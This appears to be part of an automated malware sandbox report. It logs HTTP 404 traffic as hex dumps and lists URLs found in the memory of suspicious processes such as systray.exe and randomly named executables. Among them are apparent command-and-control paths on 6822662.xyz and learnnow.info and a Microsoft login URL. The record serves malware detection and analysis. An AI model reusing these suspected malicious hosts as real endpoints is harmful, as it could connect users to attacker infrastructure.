f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 
00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 09 Dec 2024 07:43:44 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 
3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:44:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 
f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:44:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 
f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:44:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 
f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:46:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 07:46:29 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 07:46:31 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 07:46:34 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/xiaotianyou/
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/xidaoailiw/
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/xiqijiexika/
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/yasendi/
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/yuantianmeiying/
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/yuantianmeiyingh/
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/zuozuomumingxi/
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/zuozuomumingxib/
                Source: MN1qo2qaJmEvXDP.exe, rlJvZXSinaRi.exe.0.drString found in binary or memory: http://www.elderscrolls.com/skyrim/character
                Source: MN1qo2qaJmEvXDP.exe, rlJvZXSinaRi.exe.0.drString found in binary or memory: http://www.elderscrolls.com/skyrim/characterT
                Source: rlJvZXSinaRi.exe, 0000000B.00000002.2563827144.0000000003101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.elderscrolls.com/skyrim/player
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4781780276.000000000248C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnnow.info
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4781780276.000000000248C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.learnnow.info/d5up/
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003A14000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://0dyos.com
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: systray.exe, 00000013.00000002.4778260554.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
